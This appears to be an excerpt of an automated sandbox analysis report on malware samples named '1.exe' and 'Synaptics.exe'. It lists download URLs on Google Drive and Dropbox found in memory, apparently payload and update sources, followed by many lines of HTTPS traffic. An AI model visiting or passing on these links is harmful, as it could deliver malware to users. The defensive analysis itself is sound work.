                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadn.d
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnL
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadna
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnaly?F
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnd:#f;
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadne
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadness
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadnl
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoE
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoP
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoW64
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadog
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogle-
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadogles
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadolic
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadom
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle=
                              Source: Synaptics.exe, 00000003.00000002.1579357686.0000000007871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadooglev
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadors=
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadouble
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpadding-right:0
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadport
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpt
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000002.1576257579.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadra
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrgD&
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrigi
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadroject.org.cn
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrv
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsOGlE
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsion=
                              Source: Synaptics.exe, 00000003.00000002.1578422789.000000000727E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578360511.000000000713E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000544C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1575347981.00000000042AD000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1575504339.00000000046AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578249843.0000000006EBE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578205139.0000000006D7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578102618.0000000006AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1577853810.00000000064EE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578052164.00000000069BE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1577944695.000000000672E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578303103.0000000006FFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578002931.000000000687E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578154373.0000000006C3E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt-src%
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth:3
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtion-
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtp/csc
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtu
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduE
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadus(
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadusted
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvax
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000078B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvices
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvry
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvtP
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwmk
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005406000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxk
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyD
                              Source: Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyo
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyout
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzE
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzx
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1578664334.00000000077B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.0000000000815000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005492000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1430792248.0000000005492000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.goow
                              Source: Synaptics.exe, 00000003.00000003.1430792248.000000000542F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.0000000005439000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
                              Source: Synaptics.exe, 00000003.00000003.1430792248.0000000005444000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1576257579.00000000053A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1576257579.0000000005418000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1579357686.000000000790E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGI
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ78
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ78sH
                              Source: Synaptics.exe, 00000003.00000002.1574300053.00000000007B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloado
                              Source: Synaptics.exe, 00000003.00000003.1435345190.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                              Source: Synaptics.exe, 00000003.00000002.1574300053.000000000077B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: 1.exe, 00000001.00000003.1317389271.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1574683865.0000000001FE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                              Source: unknownHTTPS traffic detected: 142.250.185.110:443 -> 192.168.2.11:49744 version: TLS 1.2
